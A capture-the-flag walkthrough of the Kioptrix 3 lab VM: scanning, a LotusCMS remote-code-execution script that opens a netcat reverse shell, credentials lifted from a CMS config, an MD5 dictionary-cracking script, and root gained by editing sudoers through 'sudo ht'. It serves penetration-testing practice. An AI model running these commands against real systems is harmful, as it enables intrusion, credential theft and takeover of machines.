Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
1. Network discovery
nmap -sn <ip>/24
My target is 10.0.2.8.
Reading the VM's description file: I have to add the target to the hosts file.
On the attacker machine, edit the hosts file.
nano /etc/hosts
Add a line with the target IP and the host name (kioptrix3.com, which the exploit script below is pointed at).
2. Port scan
nmap -Pn 10.0.2.8
nmap -Pn -p1000- 10.0.2.8
There are only 2 open ports, 22 and 80 (the second scan covers the ports above the default range).
3. OS and service scan
nmap -A -p22,80 10.0.2.8
4. Vuln scan
nmap --script vuln -p22,80 10.0.2.8
The HTTP service on port 80 serves several pages, and the script output suggests a possible SQL injection.
6. Nikto scan
nikto -h http://10.0.2.8
There is a “/phpmyadmin” directory and some other possible issues.
7. Access the site
View the page source.
Explore every page.
The last one is the login page; it indicates that the site is based on LotusCMS.
8. Exploitation
Search for exploit scripts
searchsploit lotuscms
There is one result, but it is a Metasploit module.
After some googling, I came across this script.
Download it
wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
Make the script executable and run it (chmod +x is enough; 777 also makes it world-writable).
chmod 777 lotusRCE.sh
./lotusRCE.sh
I got the usage message.
Run the script again, this time against the target.
./lotusRCE.sh kioptrix3.com
Before supplying an IP, I need a listener for the reverse shell.
Create listener on port 1234
rlwrap nc -lvp 1234
Supply the input.
IP: 10.0.2.24 (attacker IP)
PORT: 1234
Select the first netcat command.
#? 1
Back at the listener, I now have a shell. Type a command to verify.
ls
I need a TTY shell.
python -c 'import pty;pty.spawn("/bin/bash");'
Verify the current user.
whoami
9. Privilege escalation
cd /home
ls
There are 3 directories.
In loneferret there are 2 interesting files.
cat checksec.sh | less
Not much of use right now.
Read the next file.
cat CompanyPolicy.README
It says to use the “sudo ht” command.
Let's try it.
sudo ht
sudo asks for a password, and I don't have the password for ‘www-data’.
Continue exploring in “/www”. Normally a CMS has a config file containing the username and password for the SQL connection, so I have to find it.
I found it in gconfig.php.
cat gconfig.php
Now I have the username and password for MySQL.
Since the site also has phpMyAdmin, I'll access the MySQL DB through its GUI.
Open database gallery, table dev_accounts. It holds the password hashes of two users, dreg and loneferret.
Crack them with CrackStation.
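CrackStation is an online lookup, which means the hashes leave the engagement. The same two passwords fall to an offline dictionary attack, shown here as an added example (not the author's code). The dev_accounts rows are reconstructed as MD5 digests of the two passwords the walkthrough recovers (Mast3r and starwars) plus one constructed row whose digest (MD5 of the empty string) is not covered by the wordlist, so the miss case is visible; the wordlist itself is constructed to stand in for a real one such as rockyou.txt.

```python
import hashlib
from typing import Dict, Iterable, Optional


def md5_hex(candidate: str) -> str:
    """Unsalted MD5 hex digest, the format stored in dev_accounts."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


# Constructed sample of the dev_accounts table: (username -> md5 hex).
# The first two digests are MD5("Mast3r") and MD5("starwars"); the third is
# MD5("") and stands in for an account the wordlist does not cover.
DEV_ACCOUNTS: Dict[str, str] = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
    "webmaster": "d41d8cd98f00b204e9800998ecf8427e",
}

# Constructed wordlist; a real run would stream a file such as rockyou.txt.
WORDLIST = ["password", "123456", "kioptrix", "Mast3r", "admin", "starwars", "letmein"]


def crack_md5(targets: Dict[str, str], words: Iterable[str]) -> Dict[str, Optional[str]]:
    """Dictionary attack over unsalted MD5.

    Each word is hashed once and matched against every target at the same time:
    without a salt, one digest serves all users, which is why cracking the whole
    table costs no more than cracking one row. Users not found map to None.
    """
    by_hash: Dict[str, list] = {}
    for user, digest in targets.items():
        by_hash.setdefault(digest.lower(), []).append(user)

    found: Dict[str, Optional[str]] = {user: None for user in targets}
    remaining = set(by_hash)
    for word in words:
        if not remaining:
            break  # everything cracked, stop reading the wordlist early
        digest = md5_hex(word)
        if digest in remaining:
            for user in by_hash[digest]:
                found[user] = word
            remaining.discard(digest)
    return found


if __name__ == "__main__":
    for user, password in crack_md5(DEV_ACCOUNTS, WORDLIST).items():
        print(f"{user}: {password if password is not None else '<not in wordlist>'}")
```

The lookup-by-digest structure is the point: it is the same property (unsalted, fast hash) that lets CrackStation answer instantly, and it is what per-user salting and a slow KDF such as bcrypt would remove.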
Change user to dreg.
su dreg
Password: Mast3r
I tried to explore, but the shell did not allow me to use the ‘cd’ command.
Tried ‘sudo ht’. User ‘dreg’ is not in the sudoers file.
Change to loneferret.
su loneferret
Password: starwars
Tried sudo ht.
sudo ht
I could not use this command because the terminal was not fully functional.
Since the policy file pointed at ‘sudo ht’, my first guess for privilege escalation is a sudo permission.
Verify the sudo permissions of loneferret.
sudo -l
Tried su.
sudo su
Not allowed.
Next is the ‘ht’ command, which I did not know. Googling it showed that it is an editor. Because it runs as root through sudo, I can run ‘sudo ht’, open the sudoers file and edit it to escalate my privileges.
I need a fully functional terminal, so I SSH in as loneferret.
ssh loneferret@10.0.2.8
I found a guide on using the ht editor.
Run ht.
sudo ht
Press F3, type “/etc/sudoers” and press Enter to open the file.
My first try was removing the ‘!’ from loneferret's entry.
Press F2 to save and Ctrl+C to exit.
sudo su -
Still no go.
Edit the file again, this time adding the following to loneferret's list of allowed commands:
/bin/bash
Verify the edit.
sudo -l
sudo /bin/bash -p
Now I’m root.
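The reasoning behind this escalation (an editor run through sudo can rewrite /etc/sudoers, and a ‘!’ entry only forbids the one path it names) can be checked mechanically from the output of sudo -l. The following is an added example, not the author's code: a parser for sudo -l listings that flags commands giving a root shell or root file write, run on a constructed listing shaped like loneferret's before and after /bin/bash is added. The command paths (/usr/bin/su, /usr/local/bin/ht) and the listing layout are assumptions for the example, not copied from the target.

```python
import os
import re
from typing import List, NamedTuple

# Binaries that yield a root shell or a root file write when run under sudo.
# ht is included because an editor running as root can rewrite /etc/sudoers.
ESCALATION_BINARIES = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash",
                       "su", "find", "awk"}


class SudoEntry(NamedTuple):
    runas: str      # user(s) the command may run as, e.g. "root"
    nopasswd: bool  # True when the NOPASSWD tag applies
    command: str    # path as listed, without the leading '!'
    negated: bool   # True for a '!' entry, i.e. the command is forbidden


# One per-command line of `sudo -l`: "(runas) TAG: TAG: cmd1, cmd2, ..."
_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(output: str) -> List[SudoEntry]:
    """Parse the per-command lines of `sudo -l` output; header lines are skipped."""
    entries: List[SudoEntry] = []
    for line in output.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for raw in m.group("cmds").split(","):
            raw = raw.strip()
            if not raw:
                continue
            negated = raw.startswith("!")
            # Keep only the program path; trailing argument restrictions are dropped.
            path = raw.lstrip("!").split()[0]
            entries.append(SudoEntry(m.group("runas"), nopasswd, path, negated))
    return entries


def escalation_paths(entries: List[SudoEntry]) -> List[str]:
    """Allowed (non-negated) commands that give root: ALL, or a known shell/editor."""
    hits: List[str] = []
    for e in entries:
        if e.negated:
            continue  # a '!' entry blocks this path, but nothing else
        if e.command == "ALL" or os.path.basename(e.command) in ESCALATION_BINARIES:
            hits.append(e.command)
    return hits


# Constructed listing in the shape `sudo -l` prints, before the sudoers edit.
BEFORE_EDIT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
"""

# The same listing after /bin/bash has been added to the entry.
AFTER_EDIT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
"""

if __name__ == "__main__":
    for label, listing in (("before", BEFORE_EDIT), ("after", AFTER_EDIT)):
        print(label, escalation_paths(parse_sudo_l(listing)))
```

On the "before" listing the only hit is the editor, which is exactly the path the walkthrough takes; the negated su entry is reported as forbidden and does not change the result. The check is the one to run on a sudo -l output during a review: any NOPASSWD entry whose basename is a shell or editor is a root shell, regardless of what else the line forbids.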
Find the flag.
cd /root
cat Congrats.txt